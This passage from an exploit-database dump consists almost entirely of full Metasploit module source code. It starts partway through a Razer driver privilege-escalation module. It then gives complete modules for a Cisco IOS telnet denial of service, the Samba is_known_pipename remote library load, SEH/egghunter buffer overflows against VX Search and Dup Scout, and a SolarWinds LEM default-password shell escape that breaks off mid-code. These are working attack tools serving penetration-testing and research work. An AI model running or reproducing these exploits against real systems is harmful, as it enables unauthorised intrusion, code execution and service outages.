HOOK_STUB_MAX_LENGTH\n\n winlogon.memory.write(hook_stub_address, hook_stub)\n vprint_status(\"Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}\")\n\n # install the asm trampolines to jump to the hook\n user32_trampolines.each do |function, trampoline_info|\n address = trampoline_info[:address]\n trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{\n mov rax, 0x#{address.to_s(16)}\n push rax\n mov rax, 0x#{hook_stub_address.to_s(16)}\n jmp rax\n }).encode_string\n winlogon.memory.write(address, trampoline)\n vprint_status(\"Installed user32!#{function} trampoline at 0x#{address.to_s(16)}\")\n end\n\n session.railgun.user32.LockWorkStation()\n session.railgun.kernel32.CloseHandle(handle)\n end\n\n def get_address(dll_handle, function_name)\n result = session.railgun.kernel32.GetProcAddress(dll_handle, function_name)\n fail_with(Failure::Unknown, 'Failed to get function address') if result['return'] == 0\n result['return']\n end\n\n # this is where the actual vulnerability is leveraged\n def get_handle(pid)\n handle = open_device(\"\\\\\\\\.\\\\47CD78C9-64C3-47C2-B80F-677B887CF095\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\n return nil unless handle\n vprint_status('Successfully opened a handle to the driver')\n\n buffer = [pid, 0].pack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')\n\n session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD',[\n ['DWORD', 'FileHandle', 'in' ],\n ['DWORD', 'Event', 'in' ],\n ['LPVOID', 'ApcRoutine', 'in' ],\n ['LPVOID', 'ApcContext', 'in' ],\n ['PDWORD', 'IoStatusBlock', 'out'],\n ['DWORD', 'IoControlCode', 'in' ],\n ['PBLOB', 'InputBuffer', 'in' ],\n ['DWORD', 'InputBufferLength', 'in' ],\n ['PBLOB', 'OutputBuffer', 'out'],\n ['DWORD', 'OutputBufferLength', 'in' ],\n ])\n result = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a050, buffer, buffer.length, buffer.length, buffer.length)\n return nil if result['return'] != 0\n session.railgun.kernel32.CloseHandle(handle)\n\n result['OutputBuffer'].unpack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')[1]\n end\n\n def get_hook(shellcode_address, restore)\n dll_handle = session.railgun.kernel32.GetModuleHandleA('kernel32')['return']\n return nil if dll_handle == 0\n create_thread_address = get_address(dll_handle, 'CreateThread')\n\n stub = %{\n call main\n ; restore the functions where the trampolines were installed\n push rbx\n }\n\n restore.each do |function, trampoline_info|\n original = trampoline_info[:original].unpack('Q*')\n stub << \"mov rax, 0x#{trampoline_info[:address].to_s(16)}\"\n original.each do |chunk|\n stub << %{\n mov rbx, 0x#{chunk.to_s(16)}\n mov qword ptr ds:[rax], rbx\n add rax, 8\n }\n end\n end\n\n stub << %{\n pop rbx\n ret\n\n main:\n ; backup registers we're going to mangle\n push r9\n push r8\n push rdx\n push rcx\n\n ; setup the arguments for the call to CreateThread\n xor rax, rax\n push rax ; lpThreadId\n push rax ; dwCreationFlags\n xor r9, r9 ; lpParameter\n mov r8, 0x#{shellcode_address.to_s(16)} ; lpStartAddress\n xor rdx, rdx ; dwStackSize\n xor rcx, rcx ; lpThreadAttributes\n mov rax, 0x#{create_thread_address.to_s(16)} ; &CreateThread\n\n call rax\n add rsp, 16\n\n ; restore arguments that were mangled\n pop rcx\n pop rdx\n pop r8\n pop r9\n ret\n }\n Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/razer_zwopenprocess.rb"}, {"lastseen": "2019-11-01T19:13:48", "bulletinFamily": "exploit", "description": "This module triggers a Denial of Service condition in the Cisco IOS telnet service affecting multiple Cisco switches. Tested against Cisco Catalyst 2960 and 3750.\n", "modified": "2017-07-24T13:26:21", "published": "2017-06-25T20:06:44", "id": "MSF:AUXILIARY/DOS/CISCO/IOS_TELNET_ROCEM", "href": "", "type": "metasploit", "title": "Cisco IOS Telnet Denial of Service", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Cisco IOS Telnet Denial of Service',\n 'Description' => %q{\n This module triggers a Denial of Service condition in the Cisco IOS\n telnet service affecting multiple Cisco switches. Tested against Cisco\n Catalyst 2960 and 3750.\n },\n 'Author' => [ 'Artem Kondratenko' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['BID', '96960'],\n ['CVE', '2017-3881'],\n ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp'],\n ['URL', 'https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution']\n ],\n 'DisclosureDate' => 'Mar 17 2017'))\n\n register_options([ Opt::RPORT(23) ])\n end\n\n def run\n begin\n connect\n print_status \"Connected to telnet service\"\n packet = sock.read(200)\n if packet.nil?\n print_error \"Failed to get initial packet from telnet service.\"\n else\n print_status \"Got initial packet from telnet service: \" + packet.inspect\n end\n print_status \"Sending Telnet DoS packet\"\n sock.put(\"\\xff\\xfa\\x24\\x00\\x03CISCO_KITS\\x012:\" + Rex::Text.rand_text_alpha(1000) + \":1:\\xff\\xf0\")\n disconnect\n rescue ::Rex::ConnectionRefused\n print_status \"Unable to connect to #{rhost}:#{rport}.\"\n rescue ::Errno::ECONNRESET\n print_good \"DoS packet successful. #{rhost} not responding.\"\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/cisco/ios_telnet_rocem.rb"}, {"lastseen": "2019-10-30T15:08:16", "bulletinFamily": "exploit", "description": "This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. In some cases, anonymous access combined with common filesystem locations can be used to automatically exploit this vulnerability.\n", "modified": "2019-01-10T19:19:14", "published": "2017-05-25T00:42:04", "id": "MSF:EXPLOIT/LINUX/SAMBA/IS_KNOWN_PIPENAME", "href": "", "type": "metasploit", "title": "Samba is_known_pipename() Arbitrary Module Load", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Samba is_known_pipename() Arbitrary Module Load',\n 'Description' => %q{\n This module triggers an arbitrary shared library load vulnerability\n in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module\n requires valid credentials, a writeable folder in an accessible share,\n and knowledge of the server-side path of the writeable folder. In\n some cases, anonymous access combined with common filesystem locations\n can be used to automatically exploit this vulnerability.\n },\n 'Author' =>\n [\n 'steelo <knownsteelo[at]gmail.com>', # Vulnerability Discovery & Python Exploit\n 'hdm', # Metasploit Module\n 'bcoles', # Check logic\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2017-7494' ],\n [ 'URL', 'https://www.samba.org/samba/security/CVE-2017-7494.html' ],\n ],\n 'Payload' =>\n {\n 'Space' => 9000,\n 'DisableNops' => true\n },\n 'Platform' => 'linux',\n 'Targets' =>\n [\n\n [ 'Automatic (Interact)',\n { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ], 'Interact' => true,\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find'\n }\n }\n }\n ],\n [ 'Automatic (Command)',\n { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] }\n ],\n [ 'Linux x86', { 'Arch' => ARCH_X86 } ],\n [ 'Linux x86_64', { 'Arch' => ARCH_X64 } ],\n [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ],\n [ 'Linux ARM64', { 'Arch' => ARCH_AARCH64 } ],\n [ 'Linux MIPS', { 'Arch' => ARCH_MIPS } ],\n [ 'Linux MIPSLE', { 'Arch' => ARCH_MIPSLE } ],\n [ 'Linux MIPS64', { 'Arch' => ARCH_MIPS64 } ],\n [ 'Linux MIPS64LE', { 'Arch' => ARCH_MIPS64LE } ],\n [ 'Linux PPC', { 'Arch' => ARCH_PPC } ],\n [ 'Linux PPC64', { 'Arch' => ARCH_PPC64 } ],\n [ 'Linux PPC64 (LE)', { 'Arch' => ARCH_PPC64LE } ],\n [ 'Linux SPARC', { 'Arch' => ARCH_SPARC } ],\n [ 'Linux SPARC64', { 'Arch' => ARCH_SPARC64 } ],\n [ 'Linux s390x', { 'Arch' => ARCH_ZARCH } ],\n ],\n 'DefaultOptions' =>\n {\n 'DCERPC::fake_bind_multi' => false,\n 'SHELL' => '/bin/sh',\n },\n 'Privileged' => true,\n 'DisclosureDate' => 'Mar 24 2017',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']),\n OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']),\n ])\n end\n\n def post_auth?\n true\n end\n\n # Setup our mapping of Metasploit architectures to gcc architectures\n def setup\n super\n @@payload_arch_mappings = {\n ARCH_X86 => [ 'x86' ],\n ARCH_X64 => [ 'x86_64' ],\n ARCH_MIPS => [ 'mips' ],\n ARCH_MIPSLE => [ 'mipsel' ],\n ARCH_MIPSBE => [ 'mips' ],\n ARCH_MIPS64 => [ 'mips64' ],\n ARCH_MIPS64LE => [ 'mips64el' ],\n ARCH_PPC => [ 'powerpc' ],\n ARCH_PPC64 => [ 'powerpc64' ],\n ARCH_PPC64LE => [ 'powerpc64le' ],\n ARCH_SPARC => [ 'sparc' ],\n ARCH_SPARC64 => [ 'sparc64' ],\n ARCH_ARMLE => [ 'armel', 'armhf' ],\n ARCH_AARCH64 => [ 'aarch64' ],\n ARCH_ZARCH => [ 's390x' ],\n }\n\n # Architectures we don't offically support but can shell anyways with interact\n @@payload_arch_bonus = %W{\n mips64el sparc64 s390x\n }\n\n # General platforms (OS + C library)\n @@payload_platforms = %W{\n linux-glibc\n }\n end\n\n # List all top-level directories within a given share\n def enumerate_directories(share)\n begin\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n stuff = self.simple.client.find_first(\"\\\\*\")\n directories = [\"\"]\n stuff.each_pair do |entry,entry_attr|\n next if %W{. ..}.include?(entry)\n next unless entry_attr['type'] == 'D'\n directories << entry\n end\n\n return directories\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n vprint_error(\"Enum #{share}: #{e}\")\n return nil\n\n ensure\n simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n end\n end\n\n # Determine whether a directory in a share is writeable\n def verify_writeable_directory(share, directory=\"\")\n begin\n simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n\n random_filename = Rex::Text.rand_text_alpha(5)+\".txt\"\n filename = directory.length == 0 ? \"\\\\#{random_filename}\" : \"\\\\#{directory}\\\\#{random_filename}\"\n\n wfd = simple.open(filename, 'rwct')\n wfd << Rex::Text.rand_text_alpha(8)\n wfd.close\n\n simple.delete(filename)\n return true\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n vprint_error(\"Write #{share}#{filename}: #{e}\")\n return false\n\n ensure\n simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n end\n end\n\n # Call NetShareGetInfo to retrieve the server-side path\n def find_share_path\n share_info = smb_netsharegetinfo(@share)\n share_info[:path].gsub(\"\\\\\", \"/\").sub(/^.*:/, '')\n end\n\n # Crawl top-level directories and test for writeable\n def find_writeable_path(share)\n subdirs = enumerate_directories(share)\n return unless subdirs\n\n if datastore['SMB_FOLDER'].to_s.length > 0\n subdirs.unshift(datastore['SMB_FOLDER'])\n end\n\n subdirs.each do |subdir|\n next unless verify_writeable_directory(share, subdir)\n return subdir\n end\n\n nil\n end\n\n # Locate a writeable directory across identified shares\n def find_writeable_share_path\n @path = nil\n share_info = smb_netshareenumall\n if datastore['SMB_SHARE_NAME'].to_s.length > 0\n share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']\n end\n\n share_info.each do |share|\n next if share.first.upcase == 'IPC$'\n found = find_writeable_path(share.first)\n next unless found\n @share = share.first\n @path = found\n break\n end\n end\n\n # Locate a writeable share\n def find_writeable\n find_writeable_share_path\n unless @share && @path\n print_error(\"No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER\")\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n print_status(\"Using location \\\\\\\\#{rhost}\\\\#{@share}\\\\#{@path} for the path\")\n end\n\n # Store the wrapped payload into the writeable share\n def upload_payload(wrapped_payload)\n begin\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\n\n random_filename = Rex::Text.rand_text_alpha(8)+\".so\"\n filename = @path.length == 0 ? \"\\\\#{random_filename}\" : \"\\\\#{@path}\\\\#{random_filename}\"\n\n wfd = simple.open(filename, 'rwct')\n wfd << wrapped_payload\n wfd.close\n\n @payload_name = random_filename\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n print_error(\"Write #{@share}#{filename}: #{e}\")\n return false\n\n ensure\n simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\n end\n\n print_status(\"Uploaded payload to \\\\\\\\#{rhost}\\\\#{@share}#{filename}\")\n return true\n end\n\n # Try both pipe open formats in order to load the uploaded shared library\n def trigger_payload\n\n target = [@share_path, @path, @payload_name].join(\"/\").gsub(/\\/+/, '/')\n [\n \"\\\\\\\\PIPE\\\\\" + target,\n target\n ].each do |tpath|\n\n print_status(\"Loading the payload from server-side path #{target} using #{tpath}...\")\n\n smb_connect\n\n # Try to execute the shared library from the share\n begin\n simple.client.create_pipe(tpath)\n probe_module_path(tpath)\n\n rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply, ::Timeout::Error, ::EOFError\n # Common errors we can safely ignore\n\n rescue Rex::Proto::SMB::Exceptions::ErrorCode => e\n\n # Look for STATUS_OBJECT_PATH_INVALID indicating our interact payload loaded\n if e.error_code == 0xc0000039\n print_good(\"Probe response indicates the interactive payload was loaded...\")\n\n smb_shell = self.sock\n self.sock = nil\n remove_socket(sock)\n handler(smb_shell)\n return true\n else\n print_error(\" >> Failed to load #{e.error_name}\")\n end\n end\n\n disconnect\n\n end\n\n false\n end\n\n # Use fancy payload wrappers to make exploitation a joyously lazy exercise\n def cycle_possible_payloads\n template_base = ::File.join(Msf::Config.data_directory, \"exploits\", \"CVE-2017-7494\")\n template_list = []\n template_type = nil\n template_arch = nil\n\n # Handle the generic command types first\n if target.arch.include?(ARCH_CMD)\n template_type = target['Interact'] ? 'findsock' : 'system'\n\n all_architectures = @@payload_arch_mappings.values.flatten.uniq\n\n # Include our bonus architectures for the interact payload\n if target['Interact']\n @@payload_arch_bonus.each do |t_arch|\n all_architectures << t_arch\n end\n end\n\n # Prioritize the most common architectures first\n %W{ x86_64 x86 armel armhf mips mipsel }.each do |t_arch|\n template_list << all_architectures.delete(t_arch)\n end\n\n # Queue up the rest for later\n all_architectures.each do |t_arch|\n template_list << t_arch\n end\n\n # Handle the specific architecture targets next\n else\n template_type = 'shellcode'\n target.arch.each do |t_name|\n @@payload_arch_mappings[t_name].each do |t_arch|\n template_list << t_arch\n end\n end\n end\n\n # Remove any duplicates that mau have snuck in\n template_list.uniq!\n\n # Cycle through each top-level platform we know about\n @@payload_platforms.each do |t_plat|\n\n # Cycle through each template and yield\n template_list.each do |t_arch|\n\n\n wrapper_path = ::File.join(template_base, \"samba-root-#{template_type}-#{t_plat}-#{t_arch}.so.gz\")\n next unless ::File.exists?(wrapper_path)\n\n data = ''\n ::File.open(wrapper_path, \"rb\") do |fd|\n data = Rex::Text.ungzip(fd.read)\n end\n\n pidx = data.index('PAYLOAD')\n if pidx\n data[pidx, payload.encoded.length] = payload.encoded\n end\n\n vprint_status(\"Using payload wrapper 'samba-root-#{template_type}-#{t_arch}'...\")\n yield(data)\n end\n end\n end\n\n # Verify that the payload settings make sense\n def sanity_check\n if target['Interact'] && datastore['PAYLOAD'] != \"cmd/unix/interact\"\n print_error(\"Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact\")\n print_error(\" Please set PAYLOAD to cmd/unix/interact and try this again\")\n print_error(\"\")\n fail_with(Failure::NoTarget, \"Invalid payload chosen for the interactive target\")\n end\n\n if ! target['Interact'] && datastore['PAYLOAD'] == \"cmd/unix/interact\"\n print_error(\"Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact\")\n print_error(\" Please set a valid PAYLOAD and try this again\")\n print_error(\"\")\n fail_with(Failure::NoTarget, \"Invalid payload chosen for the non-interactive target\")\n end\n end\n\n # Shorthand for connect and login\n def smb_connect\n connect\n smb_login\n end\n\n # Start the shell train\n def exploit\n # Validate settings\n sanity_check\n\n # Setup SMB\n smb_connect\n\n # Find a writeable share\n find_writeable\n\n # Retrieve the server-side path of the share like a boss\n print_status(\"Retrieving the remote path of the share '#{@share}'\")\n @share_path = find_share_path\n print_status(\"Share '#{@share}' has server-side path '#{@share_path}\")\n\n # Disconnect\n disconnect\n\n # Create wrappers for each potential architecture\n cycle_possible_payloads do |wrapped_payload|\n\n # Connect, upload the shared library payload, disconnect\n smb_connect\n upload_payload(wrapped_payload)\n disconnect\n\n # Trigger the payload\n early = trigger_payload\n\n # Cleanup the payload\n begin\n smb_connect\n simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\n uploaded_path = @path.length == 0 ? \"\\\\#{@payload_name}\" : \"\\\\#{@path}\\\\#{@payload_name}\"\n simple.delete(uploaded_path)\n disconnect\n rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply, ::Timeout::Error, ::EOFError\n end\n\n # Bail early if our interact payload loaded\n return if early\n end\n end\n\n # A version-based vulnerability check for Samba\n def check\n res = smb_fingerprint\n\n unless res['native_lm'] =~ /Samba ([\\d\\.]+)/\n print_error(\"does not appear to be Samba: #{res['os']} / #{res['native_lm']}\")\n return CheckCode::Safe\n end\n\n samba_version = Gem::Version.new($1.gsub(/\\.$/, ''))\n\n vprint_status(\"Samba version identified as #{samba_version.to_s}\")\n\n if samba_version < Gem::Version.new('3.5.0')\n return CheckCode::Safe\n end\n\n # Patched in 4.4.14\n if samba_version < Gem::Version.new('4.5.0') &&\n samba_version >= Gem::Version.new('4.4.14')\n return CheckCode::Safe\n end\n\n # Patched in 4.5.10\n if samba_version > Gem::Version.new('4.5.0') &&\n samba_version < Gem::Version.new('4.6.0') &&\n samba_version >= Gem::Version.new('4.5.10')\n return CheckCode::Safe\n end\n\n # Patched in 4.6.4\n if samba_version >= Gem::Version.new('4.6.4')\n return CheckCode::Safe\n end\n\n smb_connect\n find_writeable_share_path\n disconnect\n\n if @share.to_s.length == 0\n print_status(\"Samba version #{samba_version.to_s} found, but no writeable share has been identified\")\n return CheckCode::Detected\n end\n\n print_good(\"Samba version #{samba_version.to_s} found with writeable share '#{@share}'\")\n return CheckCode::Appears\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/samba/is_known_pipename.rb"}, {"lastseen": "2019-11-22T20:28:04", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in the web interface of VX Search Enterprise v9.5.12, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1 x86.\n", "modified": "2017-07-24T13:26:21", "published": "2017-05-18T16:12:47", "id": "MSF:EXPLOIT/WINDOWS/HTTP/VXSRCHS_BOF", "href": "", "type": "metasploit", "title": "VX Search Enterprise GET Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Seh\n include Msf::Exploit::Remote::Egghunter\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'VX Search Enterprise GET Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability\n in the web interface of VX Search Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. This module has been tested\n successfully on Windows 7 SP1 x86.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniel Teixeira'\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x26\",\n 'Space' => 500\n },\n 'Targets' =>\n [\n [ 'VX Search Enterprise v9.5.12',\n {\n 'Offset' => 2488,\n 'Ret' => 0x10015ffe # POP # POP # RET [libspp.dll]\n }\n ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Mar 15 2017',\n 'DefaultTarget' => 0))\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/'\n )\n\n if res && res.code == 200\n version = res.body[/VX Search Enterprise v[^<]*/]\n if version\n vprint_status(\"Version detected: #{version}\")\n if version =~ /9\\.5\\.12/\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Detected\n end\n else\n vprint_error('Unable to determine due to a HTTP connection timeout')\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n\n eggoptions = {\n checksum: true,\n eggtag: rand_text_alpha(4, payload_badchars)\n }\n\n hunter, egg = generate_egghunter(\n payload.encoded,\n payload_badchars,\n eggoptions\n )\n\n sploit = rand_text_alpha(target['Offset'])\n sploit << generate_seh_record(target.ret)\n sploit << hunter\n sploit << make_nops(10)\n sploit << egg\n sploit << rand_text_alpha(5500)\n\n print_status('Sending request...')\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => sploit\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/vxsrchs_bof.rb"}, {"lastseen": "2019-11-24T10:38:52", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in the web interface of Dup Scout Enterprise v9.5.14, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1 x86.\n", "modified": "2017-07-24T13:26:21", "published": "2017-04-26T14:19:00", "id": "MSF:EXPLOIT/WINDOWS/HTTP/DUPSCTS_BOF", "href": "", "type": "metasploit", "title": "Dup Scout Enterprise GET Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Seh\n include Msf::Exploit::Remote::Egghunter\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Dup Scout Enterprise GET Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Dup Scout Enterprise v9.5.14, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. This module has been tested\n successfully on Windows 7 SP1 x86.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'vportal',\t # Vulnerability discovery and PoC\n 'Daniel Teixeira' # Metasploit module\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x26\",\n 'Space' => 500\n },\n 'Targets' =>\n [\n [ 'Dup Scout Enterprise v9.5.14',\n {\n 'Offset' => 2488,\n 'Ret' => 0x10050ff3 # POP # POP # RET [libspp.dll]\n }\n ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Mar 15 2017',\n 'DefaultTarget' => 0))\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/'\n )\n\n if res && res.code == 200\n version = res.body[/Dup Scout Enterprise v[^<]*/]\n if version\n vprint_status(\"Version detected: #{version}\")\n if version =~ /9\\.5\\.14/\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Detected\n end\n else\n vprint_error('Unable to determine due to a HTTP connection timeout')\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n\n eggoptions = {\n checksum: true,\n eggtag: rand_text_alpha(4, payload_badchars)\n }\n\n hunter, egg = generate_egghunter(\n payload.encoded,\n payload_badchars,\n eggoptions\n )\n\n sploit = rand_text_alpha(target['Offset'])\n sploit << generate_seh_record(target.ret)\n sploit << hunter\n sploit << make_nops(10)\n sploit << egg\n sploit << rand_text_alpha(5500)\n\n print_status('Sending request...')\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => sploit\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/dupscts_bof.rb"}, {"lastseen": "2019-11-22T04:26:03", "bulletinFamily": "exploit", "description": "This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is \"cmc\" and \"password\". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell. This module was tested against SolarWinds LEM v6.3.1.\n", "modified": "2018-08-16T02:27:40", "published": "2017-03-23T09:49:31", "id": "MSF:EXPLOIT/LINUX/SSH/SOLARWINDS_LEM_EXEC", "href": "", "type": "metasploit", "title": "SolarWind LEM Default SSH Password Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::SSH\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"SolarWind LEM Default SSH Password Remote Code Execution\",\n 'Description' => %q{\n This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH\n service is accessed with the default username and password which is \"cmc\" and \"password\". By exploiting a\n vulnerability that exist on the menuing script, an attacker can escape from restricted shell.\n\n This module was tested against SolarWinds LEM v6.3.1.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Mehmet Ince <mehmet@mehmetince.net>', # discovery & msf module\n ],\n 'References' =>\n [\n ['CVE', '2017-7722'],\n ['URL', 'http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/']\n ],\n 'DefaultOptions' =>\n {\n 'Payload' => 'python/meterpreter/reverse_tcp',\n },\n 'Platform' => ['python'],\n 'Arch' => ARCH_PYTHON,\n 'Targets' => [ ['Automatic', {}] ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Mar 17 2017\",\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n Opt::RPORT(32022),\n OptString.new('USERNAME', [ true, 'The username for authentication', 'cmc' ]),\n OptString.new('PASSWORD', [ true, 'The password for authentication', 'password' ]),\n ]\n )\n\n register_advanced_options(\n [\n OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),\n OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])\n ]\n )\n end\n\n def rhost\n datastore['RHOST']\n end\n\n def rport\n datastore['RPORT']\n end\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def exploit\n factory = ssh_socket_factory\n opts = {\n :auth_methods => ['keyboard-interactive'],\n :port => rport,\n :use_agent => false,\n :config => false,\n :password => password,\n :proxy => factory,\n :non_interactive => true,\n :verify_host_key => :never\n }\n\n opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']\n\n print_status(\"#{rhost}:#{rport} - Attempting to login...\")\n\n begin\n ssh = nil\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\n ssh = Net::SSH.start(rhost, username, opts)\n end\n rescue Rex::ConnectionError\n return\n rescue Net::SSH::Disconnect, ::EOFError\n print_error \"#{rhost}:#{rport} SSH - Disconnected during negotiation\"\n return\n rescue ::Timeout::Error\n print_error \"#{rhost}:#{rport} SSH - Timed out during negotiation\"\n return\n rescue Net::SSH::AuthenticationFailed\n print_error \"#{rhost}:#{rport} SSH - Failed authentication due wrong credentials.\"\n rescue Net::SSH::Exception => e\n print_error \"#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}\"\n return\n end\n\n if ssh\n payload_executed = false\n print_good(\"SSH connection is established.\")\n\n ssh.open_channel do |channel|\n print_status(\"Requesting pty... We need it in order to interact with menuing system.\")\n\n channel.request_pty do |ch, success|\n raise ::RuntimeError, \"Could not request pty!\" unless success\n print_good(\"Pty successfully obtained.\")\n\n print_status(\"Requesting a shell.\")\n ch.send_channel_request(\"shell\") do |ch, success|\n raise ::RuntimeError, \"Could not open shell!\" unless success\n print_good(\"Remote shell successfully obtained.\")\n end\n 